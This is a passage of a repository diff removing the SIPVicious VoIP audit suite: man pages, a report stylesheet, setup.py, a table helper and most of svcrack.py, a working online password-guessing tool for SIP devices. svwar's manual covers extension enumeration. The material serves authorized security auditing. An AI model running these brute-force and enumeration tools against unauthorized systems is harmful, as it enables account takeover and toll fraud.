By default we bind to all interfaces. This option
overrides that and binds to the specified ip address
.TP
\fB\-t\fR SELECTTIME, \fB\-\-timeout\fR=\fISELECTTIME\fR
This option allows you to trottle the speed at which
packets are sent. Change this if you're losing
packets. For example try 0.5.
.TP
\fB\-R\fR, \fB\-\-reportback\fR
Send the author an exception traceback. Currently
sends the command line parameters and the traceback
.TP
\fB\-A\fR, \fB\-\-autogetip\fR
Automatically get the current IP address. This is
useful when you are not getting any responses back due
to SIPVicious not resolving your local IP.
.TP
\fB\-s\fR NAME, \fB\-\-save\fR=\fINAME\fR
save the session. Has the benefit of allowing you to
resume a previous scan and allows you to export scans
.TP
\fB\-\-resume\fR=\fINAME\fR
resume a previous scan
.TP
\fB\-c\fR, \fB\-\-enablecompact\fR
enable compact mode. Makes packets smaller but
possibly less compatible
.TP
\fB\-\-randomscan\fR
Scan random IP addresses
.TP
\fB\-i\fR scan1, \fB\-\-input\fR=\fIscan1\fR
Scan IPs which were found in a previous scan. Pass the
session name as the argument
.TP
\fB\-I\fR scan1, \fB\-\-inputtext\fR=\fIscan1\fR
Scan IPs from a text file \- use the same syntax as
command line but with new lines instead of commas.
Pass the file name as the argument
.TP
\fB\-m\fR METHOD, \fB\-\-method\fR=\fIMETHOD\fR
Specify the request method \- by default this is
OPTIONS.
.TP
\fB\-d\fR, \fB\-\-debug\fR
Print SIP messages received
.TP
\fB\-\-first\fR=\fIFIRST\fR
Only send the first given number of messages (i.e.
usually used to scan only X IPs)
.TP
\fB\-e\fR EXTENSION, \fB\-\-extension\fR=\fIEXTENSION\fR
Specify an extension \- by default this is not set
.TP
\fB\-\-randomize\fR
Randomize scanning instead of scanning consecutive ip
addresses
.TP
\fB\-\-srv\fR
Scan the SRV records for SIP on the destination domain
name.The targets have to be domain names \- example.org
domain1.com
.TP
\fB\-\-fromname\fR=\fIFROMNAME\fR
Specify a name for the from header in requests
.TP
\fB\-6\fR, \fB\-\-ipv6\fR
Scan an IPv6 address
.IP
SIPvicious SIP scanner searches for SIP devices on a given network.
Copyright (C) 2021 Sandro Gauci <sandro@enablesecurity.com>
.IP
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
.IP
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
.IP
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
.SH "SEE ALSO"
The full documentation for
.B svmap.py
can be found on GitHub at <https://github.com/enablesecurity/sipvicious/wiki>.

94
misc/telecommunications/sipvicious/man1/svreport.1
View File

@ -1,94 +0,0 @@
.TH SVREPORT.PY "1" "June 2020" "svreport.py v0.3.4" "User Commands"
.SH NAME
svreport.py \- manual page for svreport.py v0.3.4
.SH SYNOPSIS
.B svreport.py
[\fIcommand\fR] [\fIoptions\fR]
.SH DESCRIPTION
Supported commands:
.IP
\- list: lists all scans
.TP
\- export:
exports the given scan to a given format
.TP
\- delete:
deletes the scan
.TP
\- stats:
print out some statistics of interest
.TP
\- search:
search for a specific string in the user agent (svmap)
.PP
examples:
.PP
.IP
svreport.py list
.PP
.IP
svreport.py export \fB\-f\fR pdf \fB\-o\fR scan1.pdf \fB\-s\fR scan1
.PP
.IP
svreport.py delete \fB\-s\fR scan1
.PP
.SH OPTIONS
.TP
\fB\-\-version\fR
show program's version number and exit
.TP
\fB\-h\fR, \fB\-\-help\fR
show this help message and exit
.TP
\fB\-v\fR, \fB\-\-verbose\fR
Increase verbosity
.TP
\fB\-q\fR, \fB\-\-quiet\fR
Quiet mode
.TP
\fB\-t\fR SESSIONTYPE, \fB\-\-type\fR=\fISESSIONTYPE\fR
Type of session. This is usually either svmap, svwar
or svcrack. If not set I will try to find the best
match
.TP
\fB\-s\fR SESSION, \fB\-\-session\fR=\fISESSION\fR
Name of the session
.TP
\fB\-f\fR FORMAT, \fB\-\-format\fR=\fIFORMAT\fR
Format type. Can be stdout, pdf, xml, csv or txt
.TP
\fB\-o\fR OUTPUTFILE, \fB\-\-output\fR=\fIOUTPUTFILE\fR
Output filename
.TP
\fB\-n\fR
Do not resolve the ip address
.TP
\fB\-c\fR, \fB\-\-count\fR
Used togather with 'list' command to count the number
of entries
.IP
SIPVicious report engine manages sessions from previous scans with SIPVicious tools and allows you to export these scans.
Copyright (C) 2021 Sandro Gauci <sandrogauc@gmail.com>
.IP
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
.IP
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
.IP
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
.SH "SEE ALSO"
The full documentation for
.B svreport.py
can be found on GitHub at <https://github.com/enablesecurity/sipvicious/wiki>.

131
misc/telecommunications/sipvicious/man1/svwar.1
View File

@ -1,131 +0,0 @@
.TH SVWAR.PY "1" "June 2020" "svwar.py v0.3.4" "User Commands"
.SH NAME
svwar.py \- manual page for svwar.py v0.3.4
.SH SYNOPSIS
.B svwar.py
[\fIoptions\fR] \fItarget\fR
.SH DESCRIPTION
examples:
svwar.py \fB\-e100\-999\fR udp://10.0.0.1:5080
svwar.py \fB\-d\fR dictionary.txt 10.0.0.2
.SH OPTIONS
.TP
\fB\-\-version\fR
show program's version number and exit
.TP
\fB\-h\fR, \fB\-\-help\fR
show this help message and exit
.TP
\fB\-v\fR, \fB\-\-verbose\fR
Increase verbosity
.TP
\fB\-q\fR, \fB\-\-quiet\fR
Quiet mode
.TP
\fB\-p\fR PORT, \fB\-\-port\fR=\fIPORT\fR
Destination port or port ranges of the SIP device \- eg
\fB\-p5060\fR,5061,8000\-8100
.TP
\fB\-P\fR PORT, \fB\-\-localport\fR=\fIPORT\fR
Source port for our packets
.TP
\fB\-x\fR IP, \fB\-\-externalip\fR=\fIIP\fR
IP Address to use as the external ip. Specify this if
you have multiple interfaces or if you are behind NAT
.TP
\fB\-b\fR BINDINGIP, \fB\-\-bindingip\fR=\fIBINDINGIP\fR
By default we bind to all interfaces. This option
overrides that and binds to the specified ip address
.TP
\fB\-t\fR SELECTTIME, \fB\-\-timeout\fR=\fISELECTTIME\fR
This option allows you to trottle the speed at which
packets are sent. Change this if you're losing
packets. For example try 0.5.
.TP
\fB\-R\fR, \fB\-\-reportback\fR
Send the author an exception traceback. Currently
sends the command line parameters and the traceback
.TP
\fB\-A\fR, \fB\-\-autogetip\fR
Automatically get the current IP address. This is
useful when you are not getting any responses back due
to SIPVicious not resolving your local IP.
.TP
\fB\-s\fR NAME, \fB\-\-save\fR=\fINAME\fR
save the session. Has the benefit of allowing you to
resume a previous scan and allows you to export scans
.TP
\fB\-\-resume\fR=\fINAME\fR
resume a previous scan
.TP
\fB\-c\fR, \fB\-\-enablecompact\fR
enable compact mode. Makes packets smaller but
possibly less compatible
.TP
\fB\-d\fR DICTIONARY, \fB\-\-dictionary\fR=\fIDICTIONARY\fR
specify a dictionary file with possible extension
names or - for stdin
.TP
\fB\-m\fR OPTIONS, \fB\-\-method\fR=\fIOPTIONS\fR
specify a request method. The default is REGISTER.
Other possible methods are OPTIONS and INVITE
.TP
\fB\-e\fR RANGE, \fB\-\-extensions\fR=\fIRANGE\fR
specify an extension or extension range example: \fB\-e\fR
100\-999,1000\-1500,9999
.TP
\fB\-z\fR PADDING, \fB\-\-zeropadding\fR=\fIPADDING\fR
the number of zeros used to padd the username.
the options "\-e 1\-9999 \fB\-z\fR 4" would give 0001 0002 0003
\&... 9999
.TP
\fB\-\-force\fR
Force scan, ignoring initial sanity checks.
.TP
\fB\-T\fR TEMPLATE, \fB\-\-template\fR=\fITEMPLATE\fR
A format string which allows us to specify a template
for the extensions example
svwar.py \fB\-e\fR 1\-999 \fB\-\-template=\fR"123%#04i999" would scan
between 1230001999 to 1230999999"
.TP
\fB\-D\fR, \fB\-\-enabledefaults\fR
Scan for default / typical extensions such as
1000,2000,3000 ... 1100, etc. This option is off by
default. Use \fB\-\-enabledefaults\fR to
enable this functionality
.TP
\fB\-\-maximumtime\fR=\fIMAXIMUMTIME\fR
Maximum time in seconds to keep sending requests
without receiving a response
back
.TP
\fB\-\-domain\fR=\fIDOMAIN\fR
force a specific domain name for the SIP message, eg.
\fB\-d\fR example.org
.TP
\fB\-\-debug\fR
Print SIP messages received
.TP
\fB\-6\fR
Scan an IPv6 address
.IP
Sipvicious extension line scanner scans SIP PaBXs for valid extension lines.
Copyright (C) 2021 Sandro Gauci <sandro@enablesecurity.com>
.IP
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
.IP
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
.IP
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
.SH "SEE ALSO"
The full documentation for
.B svwar.py
can be found on GitHub at <https://github.com/enablesecurity/sipvicious/wiki>.

61
misc/telecommunications/sipvicious/resources/sv.xsl
View File

@ -1,61 +0,0 @@
<?xml version="1.0" encoding="ISO-8859-1"?>
<!-- =========================================================================
sv.xsl stylesheet version 0.1
last change: Mon Nov 19 13:08:55 GMT 2012
Sandro Gauci, http://enablesecurity.com
==============================================================================
Copyright (c) 2012 Sandro Gauci
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. The name of the author may not be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
========================================================================== -->
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="root">
<html>
<body>
<h2>
<xsl:value-of select="title"/>
</h2>
<table bgcolor="#000000">
<tr bgcolor="#000000">
<xsl:for-each select="labels/label">
<th align="left">
<font color="#ffffff"> <xsl:value-of select="name"/></font>
</th>
</xsl:for-each>
</tr>
<xsl:for-each select="results/result">
<tr bgcolor="#ffffff">
<xsl:for-each select="*">
<td><xsl:value-of select="value"/></td>
</xsl:for-each>
</tr>
</xsl:for-each>
</table>
</body>
</html>
</xsl:template>
</xsl:stylesheet>

85
misc/telecommunications/sipvicious/setup.py
View File

@ -1,85 +0,0 @@
#!/usr/bin/env python
# vim: set fileencoding=utf-8 :
#
# sipvicious/setup.py
#
# Copyright (C) 2007-2021 Sandro Gauci <sandro@enablesecurity.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
import io
import sys
if sys.version_info[0] < 3:
raise Exception("Must be using Python 3")
from os import path
from setuptools import find_packages, setup
from sipvicious.libs.svhelper import __author__, __version__
this_directory = path.abspath(path.dirname(__file__))
with io.open(path.join(this_directory, 'README.md'), encoding='utf-8') as readme_file:
desc = readme_file.read()
setup(name='sipvicious',
version=__version__,
description='SIPVicious suite is a set of tools that can be used to audit SIP based VoIP systems.',
long_description = desc,
long_description_content_type='text/markdown',
author=__author__,
author_email='sandro@enablesecurity.com',
license='GPL',
url='https://github.com/EnableSecurity/sipvicious',
project_urls={
"Bug Tracker": "https://github.com/EnableSecurity/sipvicious/issues",
"Source Code": "https://github.com/EnableSecurity/sipvicious/tree/master",
},
download_url=f'https://github.com/EnableSecurity/sipvicious/archive/v{__version__}.zip',
packages=find_packages(),
data_files = [("share/man/man1", [
"man1/svcrack.1",
"man1/svcrash.1",
"man1/svmap.1",
"man1/svreport.1",
"man1/svwar.1",
])
],
entry_points={
'console_scripts': [
'sipvicious_svmap = sipvicious.svmap:main',
'sipvicious_svwar = sipvicious.svwar:main',
'sipvicious_svcrack = sipvicious.svcrack:main',
'sipvicious_svreport = sipvicious.svreport:main',
'sipvicious_svcrash = sipvicious.svcrash:main',
]
},
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: System Administrators',
'Intended Audience :: Information Technology',
'Topic :: Internet',
'Topic :: Security',
'Topic :: System :: Networking',
'Topic :: Communications :: Telephony',
'Topic :: Communications :: Internet Phone',
'License :: OSI Approved :: GNU General Public License (GPL)',
'Programming Language :: Python :: 3',
'Operating System :: OS Independent'
],
keywords='telephony sip audit scanner voip',
python_requires='>=3.6',
)

0
misc/telecommunications/sipvicious/sipvicious/__init__.py
View File

0
misc/telecommunications/sipvicious/sipvicious/libs/__init__.py
View File

202
misc/telecommunications/sipvicious/sipvicious/libs/pptable.py
View File

@ -1,202 +0,0 @@
#!/usr/bin/env python3
# License: MIT License
# Original Code: github.com/nschloe/termtables
# Modified during porting of sipvicious from py2 to py3
import re
from collections.abc import Sequence
style = '-|++++++++++=++'
def _create_padding_tuple(padding):
# self._padding is a 4-tuple: top, right, bottom, left (just like CSS)
if isinstance(padding, int):
out = (padding, padding, padding, padding)
else:
if len(padding) == 1:
out = (padding[0], padding[0], padding[0], padding[0])
elif len(padding) == 2:
out = (padding[0], padding[1], padding[0], padding[1])
elif len(padding) == 3:
out = (padding[0], padding[1], padding[2], padding[1])
else:
assert len(padding) == 4
out = (padding[0], padding[1], padding[2], padding[3])
return out
def _create_alignment(alignment, num_columns):
if len(alignment) == 1:
alignment = num_columns * alignment
assert len(alignment) == num_columns
return alignment
def _remove_escape_sequences(string):
# https://stackoverflow.com/a/14693789/353337
ansi_escape = re.compile(r"\x1B[@-_][0-?]*[ -/]*[@-~]")
return ansi_escape.sub("", string)
def _get_column_widths(strings, num_columns):
widths = num_columns * [0]
for block in strings:
for row in block:
for j, item in enumerate(row):
widths[j] = max(widths[j], len(_remove_escape_sequences(item)))
return widths
def _align(strings, alignments, column_widths):
for block in strings:
for row in block:
for k, (item, align, cw) in enumerate(zip(row, alignments, column_widths)):
rest = cw - len(_remove_escape_sequences(item))
if rest == 0:
# row[k] = item[:cw]
row[k] = item
else:
assert rest > 0
if align == "l":
left = 0
elif align == "r":
left = rest
else:
assert align == "c"
left = rest // 2
right = rest - left
row[k] = " " * left + item + " " * right
return strings
def _add_padding(strings, column_widths, padding):
for block in strings:
for row in block:
for k, (item, cw) in enumerate(zip(row, column_widths)):
cw += padding[1] + padding[3]
s = []
for _ in range(padding[0]):
s += [" " * cw]
s += [" " * padding[3] + item + " " * padding[1]]
for _ in range(padding[2]):
s += [" " * cw]
row[k] = "\n".join(s)
return strings
def _seq_but_not_str(obj):
return isinstance(obj, Sequence) and not isinstance(obj, (str, bytes, bytearray))
def _get_depth(l):
if _seq_but_not_str(l):
return 1 + max(_get_depth(item) for item in l)
return 0
def _hjoin_multiline(join_char, strings):
"""Horizontal join of multiline strings
"""
cstrings = [string.split("\n") for string in strings]
max_num_lines = max(len(item) for item in cstrings)
pp = []
for k in range(max_num_lines):
p = [cstring[k] for cstring in cstrings]
pp.append(join_char + join_char.join(p) + join_char)
return "\n".join([p.rstrip() for p in pp])
def to_string(
data, header=None, alignment="l", padding=(0, 1), style=style
):
if len(data) == 0:
return "no results"
try:
depth = len(data.shape)
except AttributeError:
depth = _get_depth(data)
if depth == 2:
data = [data]
else:
assert depth == 3
if header:
data = [[header]] + data
# Make sure the data is consistent
num_columns = len(data[0][0])
for block in data:
for row in block:
assert len(row) == num_columns
padding = _create_padding_tuple(padding)
alignments = _create_alignment(alignment, num_columns)
if style is None:
border_chars, block_sep_chars = None, None
else:
if len(style) == 11:
border_chars = style
block_sep_chars = [
border_chars[6],
border_chars[0],
border_chars[10],
border_chars[7],
]
else:
assert len(style) == 15
border_chars = style[:11]
block_sep_chars = style[11:]
strings = [[[str(item) for item in row] for row in block] for block in data]
column_widths = _get_column_widths(strings, num_columns)
column_widths_with_padding = [c + padding[1] + padding[3] for c in column_widths]
# add spaces according to alignment
strings = _align(strings, alignments, column_widths)
# add spaces according to padding
strings = _add_padding(strings, column_widths, padding)
# Join `strings` from the innermost to the outermost index.
join_char = border_chars[1] if border_chars else ""
for block in strings:
for k, row in enumerate(block):
block[k] = _hjoin_multiline(join_char, row)
if border_chars:
bc = border_chars
cwp = column_widths_with_padding
intermediate_border_row = (
"\n" + bc[6] + bc[10].join([s * bc[0] for s in cwp]) + bc[7] + "\n"
)
else:
intermediate_border_row = "\n"
for k, block in enumerate(strings):
strings[k] = intermediate_border_row.join(block)
if block_sep_chars:
bs = block_sep_chars
block_sep_row = (
"\n" + bs[0] + bs[2].join([s * bs[1] for s in cwp]) + bs[3] + "\n"
)
else:
block_sep_row = "\n"
strings = block_sep_row.join(strings)
if border_chars:
bc = border_chars
first_border_row = bc[2] + bc[8].join([s * bc[0] for s in cwp]) + bc[3] + "\n"
last_border_row = "\n" + bc[4] + bc[9].join([s * bc[0] for s in cwp]) + bc[5]
else:
first_border_row = ""
last_border_row = ""
out = first_border_row + strings + last_border_row
return out

1170
misc/telecommunications/sipvicious/sipvicious/libs/svhelper.py
View File

File diff suppressed because it is too large Load Diff

640
misc/telecommunications/sipvicious/sipvicious/svcrack.py
View File

@ -1,640 +0,0 @@
# SIPvicious password cracker - svcrack
__GPL__ = """
SIPvicious password cracker is an online password guessing tool for SIP devices
Copyright (C) 2007-2021 Sandro Gauci <sandro@enablesecurity.com>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import logging
import dbm
import random
import select
import socket
import sys
import time
import os
import pickle
from datetime import datetime
from urllib.parse import urlparse
from sipvicious.libs.pptable import to_string
from sipvicious.libs.svhelper import ( __version__, mysendto, reportBugToAuthor,
numericbrute, dictionaryattack, packetcounter, check_ipv6, resolveexitcode,
createTag, makeRequest, getAuthHeader, getNonce, getOpaque, ArgumentParser,
getAlgorithm, getQop, getCID, getRealm, getCredentials, getRange,
standardscanneroptions, standardoptions, calcloglevel, resumeFrom
)
__prog__ = 'svcrack'
__exitcode__ = 0
class ASipOfRedWine:
def __init__(self, host='localhost', bindingip='', localport=5060, port=5060, externalip=None,
username=None, crackmode=1, crackargs=None, realm=None, sessionpath=None,
selecttime=0.005, compact=False, reusenonce=False, extension=None,
maxlastrecvtime=10, domain=None, requesturi=None, method='REGISTER', ipv6=False):
self.log = logging.getLogger('ASipOfRedWine')
family = socket.AF_INET
if ipv6:
family = socket.AF_INET6
self.ipv6 = ipv6
self.sock = socket.socket(family, socket.SOCK_DGRAM)
self.sock.settimeout(10)
self.sessionpath = sessionpath
self.maxlastrecvtime = maxlastrecvtime
self.lastrecvtime = time.time()
self.dbsyncs = False
self.method = method
if self.sessionpath is not None:
self.resultpasswd = dbm.open(
os.path.join(self.sessionpath, 'resultpasswd'), 'c')
try:
self.resultpasswd.sync()
self.dbsyncs = True
self.log.info("Db does sync")
except AttributeError:
self.log.info("Db does not sync")
pass
else:
self.resultpasswd = dict()
self.nomore = False
self.passwordcracked = False
self.rlist = [self.sock]
self.wlist = list()
self.xlist = list()
self.challenges = list()
self.crackmode = crackmode
self.crackargs = crackargs
try:
if int(port) >= 1 and int(port) <= 65535:
self.dsthost, self.dstport = host, int(port)
else:
raise ValueError
except (ValueError, TypeError):
self.log.error('port should strictly be an integer between 1 and 65535')
sys.exit(10)
self.domain = self.dsthost
if domain:
self.domain = domain
if crackmode == 1:
self.passwdgen = numericbrute(*crackargs)
elif crackmode == 2:
self.passwdgen = dictionaryattack(crackargs)
self.username = username
self.realm = realm
self.selecttime = selecttime
self.dstisproxy = None
self.ignorenewnonce = True
self.noauth = False
self.auth = dict()
self.previouspassword = str()
self.compact = compact
self.reusenonce = reusenonce
self.staticnonce = None
self.staticcid = None
if extension is not None:
self.extension = extension
else:
self.extension = username
self.bindingip = bindingip
self.localport = localport
self.requesturi = requesturi
self.noncecount = 1
self.originallocalport = localport
if self.sessionpath is not None:
self.packetcount = packetcounter(50)
if externalip is None:
self.log.debug("external ip was not set")
if (self.bindingip != '0.0.0.0') and (len(self.bindingip) > 0):
self.log.debug(
"but bindingip was set! we'll set it to the binding ip")
self.externalip = self.bindingip
else:
try:
self.log.info(
"trying to get self ip .. might take a while")
self.externalip = socket.gethostbyname(
socket.gethostname())
except socket.error:
self.externalip = '127.0.0.1'
else:
self.log.debug("external ip was set")
self.externalip = externalip
PROXYAUTHREQ = 'SIP/2.0 407 '
AUTHREQ = 'SIP/2.0 401 '
OKEY = 'SIP/2.0 200 '
NOTFOUND = 'SIP/2.0 404 '
INVALIDPASS = 'SIP/2.0 403 '
TRYING = 'SIP/2.0 100 '
def Register(self, extension, remotehost, auth=None, cid=None):
m = self.method
if cid is None:
cid = '%s' % str(random.getrandbits(32))
branchunique = '%s' % random.getrandbits(32)
cseq = 1
# Embedding value so as to not run into errors
localtag = '3206210844'.encode()
if self.ipv6 and check_ipv6(remotehost):
remotehost = '['+remotehost+']'
contact = 'sip:%s@%s' % (extension, remotehost)
if auth is not None:
cseq = 2
localtag = createTag('%s:%s' % (
self.auth['username'], self.auth['password']))
domain = self.domain
if self.ipv6 and check_ipv6(domain):
domain = '[' + self.domain + ']'
register = makeRequest(
m,
'"%s" <sip:%s@%s>' % (extension, extension, domain),
'"%s" <sip:%s@%s>' % (extension, extension, domain),
domain,
self.dstport,
callid=cid,
srchost=self.externalip,
branchunique=branchunique,
cseq=cseq,
auth=auth,
contact=contact,
localtag=localtag,
compact=self.compact,
localport=self.localport,
requesturi=self.requesturi,
)
return register
def getResponse(self):
# we got stuff to read off the socket
buff, _ = self.sock.recvfrom(8192)
buff = buff.decode('utf-8', 'ignore')
if buff.startswith(self.PROXYAUTHREQ):
self.dstisproxy = True
elif buff.startswith(self.AUTHREQ):
self.dstisproxy = False
if buff.startswith(self.PROXYAUTHREQ) or buff.startswith(self.AUTHREQ):
authheader = getAuthHeader(buff)
if authheader is not None:
nonce = getNonce(authheader)
opaque = getOpaque(authheader)
algorithm = getAlgorithm(authheader)
qop = getQop(authheader)
cid = getCID(buff)
if self.realm is None:
self.realm = getRealm(buff)
if None not in (nonce, self.realm):
if self.reusenonce:
if len(self.challenges) > 0:
return
else:
self.staticnonce = nonce
self.staticcid = cid
self.challenges.append([nonce, cid, qop, algorithm, opaque])
elif buff.startswith(self.OKEY):
self.passwordcracked = True
_tmp = getCredentials(buff)
if (_tmp is not None) and (len(_tmp) == 2):
crackeduser, crackedpasswd = _tmp
self.log.info("The password for %s is %s" %
(crackeduser.decode(), crackedpasswd.decode()))
self.resultpasswd[crackeduser] = crackedpasswd
if self.sessionpath is not None and self.dbsyncs:
self.resultpasswd.sync()
else:
self.log.info("Does not seem to require authentication")
self.noauth = True
self.resultpasswd[self.username] = '[no password]'
elif buff.startswith(self.NOTFOUND):
self.log.warning("User not found")
self.noauth = True
elif buff.startswith(self.INVALIDPASS):
pass
elif buff.startswith(self.TRYING):
pass
else:
self.log.error("We got an unknown response")
self.log.debug(buff.__repr__())
self.nomore = True
def start(self):
global __exitcode__
if self.bindingip == '':
bindingip = 'any'
else:
bindingip = self.bindingip
self.log.debug("binding to %s:%s" % (bindingip, self.localport))
while 1:
if self.localport > 65535:
self.log.critical("Could not bind to any port")
__exitcode__ = resolveexitcode(30, __exitcode__)
return
try:
self.sock.bind((self.bindingip, self.localport))
break
except socket.error:
self.log.debug("could not bind to %s" % self.localport)
self.localport += 1
if self.originallocalport != self.localport:
self.log.warning("could not bind to %s:%s - some process might already be listening on this port. Listening on port %s instead" %
(self.bindingip, self.originallocalport, self.localport))
self.log.info(
"Make use of the -P option to specify a port to bind to yourself")
# perform a test 1st ..
data = self.Register(self.extension, self.domain)
try:
mysendto(self.sock, data, (self.dsthost, self.dstport))
except socket.error as err:
self.log.error("socket error: %s" % err)
__exitcode__ = resolveexitcode(30, __exitcode__)
return
try:
self.getResponse()
self.lastrecvtime = time.time()
except socket.timeout:
self.log.error("no server response")
__exitcode__ = resolveexitcode(30, __exitcode__)
return
except socket.error as err:
self.log.error("socket error:%s" % err)
__exitcode__ = resolveexitcode(30, __exitcode__)
return
if self.noauth is True:
return
while 1:
r, _, _ = select.select(
self.rlist,
self.wlist,
self.xlist,
self.selecttime
)
if r:
if self.passwordcracked:
__exitcode__ = resolveexitcode(40, __exitcode__)
break
# we got stuff to read off the socket
try:
self.getResponse()
self.lastrecvtime = time.time()
except socket.error as err:
self.log.warning("socket error: %s" % err)
__exitcode__ = resolveexitcode(30, __exitcode__)
else:
# check if its been a while since we had a response to prevent
# flooding - otherwise stop
timediff = time.time() - self.lastrecvtime
if timediff > self.maxlastrecvtime:
self.nomore = True
self.log.warning(
'It has been %s seconds since we last received a response - stopping' % timediff)
__exitcode__ = resolveexitcode(30, __exitcode__)
if self.passwordcracked:
__exitcode__ = resolveexitcode(40, __exitcode__)
break
if self.nomore is True:
try:
while not self.passwordcracked:
self.getResponse()
except socket.timeout:
break
# no stuff to read .. its our turn to send back something
if len(self.challenges) > 0:
# we have challenges to take care of
self.auth = dict()
self.auth['username'] = self.username
self.auth['realm'] = self.realm
if self.reusenonce:
self.auth['nonce'] = self.staticnonce
cid = self.staticcid
else:
self.auth['nonce'], cid, self.auth['qop'], self.auth[
'algorithm'], self.auth['opaque'] = self.challenges.pop()
self.auth['proxy'] = self.dstisproxy
try:
self.auth['password'] = next(self.passwdgen)
self.previouspassword = self.auth['password']
self.log.debug('trying %s' % self.auth['password'])
if self.auth['algorithm'] == "md5-sess" or self.auth['qop'] == "auth":
self.auth["noncecount"] = self.noncecount
self.noncecount += 1
except StopIteration:
self.log.info("no more passwords")
self.nomore = True
continue
else:
self.auth = None
cid = None
data = self.Register(
self.extension, self.domain, self.auth, cid)
try:
mysendto(self.sock, data, (self.dsthost, self.dstport))
# self.sock.sendto(data,(self.dsthost,self.dstport))
if self.sessionpath is not None:
if next(self.packetcount):
try:
if self.crackmode == 1:
pickle.dump(self.previouspassword, open(
os.path.join(self.sessionpath, 'lastpasswd.pkl'), 'wb+'))
self.log.debug(
'logged last extension %s' % self.previouspassword)
elif self.crackmode == 2:
pickle.dump(self.crackargs.tell(), open(
os.path.join(self.sessionpath, 'lastpasswd.pkl'), 'wb+'))
self.log.debug(
'logged last position %s' % self.crackargs.tell())
except IOError:
self.log.warning('could not log the last extension scanned')
__exitcode__ = resolveexitcode(20, __exitcode__)
except socket.error as err:
self.log.error("socket error: %s" % err)
__exitcode__ = resolveexitcode(30, __exitcode__)
break
def main():
global __exitcode__
usage = "usage: %prog -u username [options] target\r\n"
usage += "examples:\r\n"
usage += "\t%prog -u 100 -d dictionary.txt udp://10.0.0.1:5080\r\n"
usage += "\t%prog -u 100 -r1-9999 -z4 10.0.0.1\r\n"
parser = ArgumentParser(usage, version="%prog v" + str(__version__) + __GPL__)
parser.add_option("-p", "--port", dest="port", default="5060",
help="Destination port of the SIP device - eg -p 5060", metavar="PORT")
parser = standardoptions(parser)
parser = standardscanneroptions(parser)
parser.add_option("-u", "--username", dest="username",
help="username to try crack", metavar="USERNAME")
parser.add_option("-d", "--dictionary", dest="dictionary", type="string",
help="specify a dictionary file with passwords or - for stdin",
metavar="DICTIONARY")
parser.add_option("-r", "--range", dest="range", default="100-999",
help="specify a range of numbers, can be a comma separated list. example: 100-200,300-310,400",
metavar="RANGE")
parser.add_option("-e", "--extension", dest="extension",
help="Extension to crack. Only specify this when the extension is different from the username.",
metavar="EXTENSION")
parser.add_option("-z", "--zeropadding", dest="zeropadding", type="int", default=0,
help="the number of zeros used to padd the password. the options \"-r 1-9999 -z 4\" " \
"would give 0001 0002 0003 ... 9999", metavar="PADDING")
parser.add_option("-n", "--reusenonce", dest="reusenonce", default=False, action="store_true",
help="Reuse nonce. Some SIP devices don't mind you reusing the nonce (making " \
"them vulnerable to replay attacks). Speeds up the cracking.",)
parser.add_option('--template', '-T', action="store", dest="template",
help="A format string which allows us to specify a template for the extensions. " \
